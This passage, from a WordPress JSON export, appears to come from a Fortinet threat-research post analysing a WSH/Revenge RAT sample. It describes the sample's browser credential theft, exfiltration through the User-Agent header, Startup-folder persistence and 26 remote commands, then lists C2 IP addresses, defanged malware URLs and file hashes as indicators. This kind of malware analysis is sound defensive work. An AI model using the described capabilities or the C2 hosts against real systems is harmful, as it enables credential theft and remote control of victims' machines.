In addition, a secondary security check is performed, which disables (<b>disableSecurity()<\/b>) the current security context.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn aem-GridColumn--default--12\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/malware-analysis-revenge-rat-sample\/_jcr_content\/root\/responsivegrid\/image_1245078942.img.png\/1573673047267\/rat-thirteen.png\" alt=\"Figure 13 \u2013 Security check code\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 13 \u2013 Security check code<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>This version of WSH RAT focuses on stealing information from popular browsers (i.e., Chrome and Mozilla Firefox); newer versions (2.3) also target additional software such as FoxMail. While WSH RAT has many features, we will focus on the most important ones, especially those triggered in the current sample.<\/p>\n<p>The script generates a properly formatted HTTP request containing information about the infected computer, and uses the \u201cUser-Agent:\u201d header as the channel to exfiltrate it. 
This information is gathered by the \u201c<b>information()<\/b>\u201d function.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--7 aem-GridColumn--offset--default--2\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/malware-analysis-revenge-rat-sample\/_jcr_content\/root\/responsivegrid\/image_527157661.img.png\/1573673429568\/screen-shot-2019-11-13-at-11.25.27-am.png\" alt=\"Figure 14 \u2013 HTTP POST Request and User-Agent data\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 14 \u2013 HTTP POST Request and User-Agent data<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>The following table shows the data format used in the User-Agent header, along with a description of how each field is collected by the script.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn--default--9 aem-GridColumn aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/malware-analysis-revenge-rat-sample\/_jcr_content\/root\/responsivegrid\/image_511138412.img.png\/1573673589995\/screen-shot-2019-11-13-at-11.32.33-am.png\" alt=\"table RevengeRAT\"\/>         <\/noscript>                   <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>To achieve persistence, WSH RAT adds new data to the Windows Registry and also copies itself into the Windows Startup folder (\u201c<b>%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup<\/b>\u201d).<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn aem-GridColumn--default--12\">               
<noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/malware-analysis-revenge-rat-sample\/_jcr_content\/root\/responsivegrid\/image_829427806.img.png\/1573673872613\/ratfifteen.png\" alt=\"Figure 15 \u2013 Added value as Startup application\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 15 \u2013 Added value as Startup application<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Also, WSH RAT makes use of a total of 26 commands, all of them self-explanatory:<\/p>\n<p>&quot;disconnect&quot;, &quot;reboot&quot;, &quot;shutdown&quot;, &quot;excecute&quot;, &quot;install-sdk&quot;, &quot;get-pass&quot;, &quot;get-pass-offline&quot;, &quot;update&quot;, &quot;uninstall&quot;, &quot;up-n-exec&quot;, &quot;bring-log&quot;, &quot;down-n-exec&quot;, &quot;filemanager&quot;, &quot;rdp&quot;, &quot;keylogger&quot;, &quot;offline-keylogger&quot;, &quot;browse-logs&quot;, &quot;cmd-shell&quot;, &quot;get-processes&quot;, &quot;disable-uac&quot;, &quot;check-eligible&quot;, &quot;force-eligible&quot;, &quot;elevate&quot;, &quot;if-elevate&quot;, &quot;kill-process&quot;, and &quot;sleep&quot;.<\/p>\n<h2>Solutions<\/h2>\n<p>The VBS download URL is rated as \u201c<b>Malicious Websites<\/b>\u201d by the FortiGuard Web Filtering service.<\/p>\n<p>The script file and the dropped EXE file are both detected and blocked by the FortiGuard Antivirus service.<\/p>\n<h2>IOCs:<\/h2>\n<h4><b>IP Addresses<\/b><\/h4>\n<p>185.84.181.102:5478<br \/> 193.56.28.134:5478<\/p>\n<h4><b>URLs<\/b><\/h4>\n<p>hxxps:\/\/scisolinc[.]com\/wp-includes\/Text\/microsoft.vbs<br \/> hxxp:\/\/britianica.uk.com:4132<\/p>\n<h4><b>Sample SHA-256<\/b><\/h4>\n<p>9ADA62E4B06F7E3A61D819B8A74F29F589B645A7A32FD6C4E3F4404672B20F24<br \/> 35C0980E99987F4418C8D186B9D5514C340C05EC0470C485182D24868F2A37DB<br \/> 
CED8BE6A20B38F5F4D5AF0F031BD69863A60BE53B9D6434DEEA943BF668AC8D8<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<p><a href=\"http:\/\/feedproxy.google.com\/~r\/fortinet\/blog\/threat-research\/~3\/lWhvucPVW_4\/malware-analysis-revenge-rat-sample.html\" target=\"bwo\" >http:\/\/feeds.feedburner.com\/fortinet\/blog\/threat-research<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"\/blog\/threat-research\/malware-analysis-revenge-rat-sample\/_jcr_content\/root\/responsivegrid\/image_1337821993.img.png\/1573604360030\/revengerat-one.png\"\/><br \/>Learn more about a new Revenge RAT sample recently captured in the wild by our FortiGuard Labs team.<\/p>\n
","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10424,10378],"tags":[],"class_list":["post-16883","post","type-post","status-publish","format-standard","hentry","category-fortinet","category-security"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/16883","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=16883"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/16883\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=16883"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=16883"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=16883"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}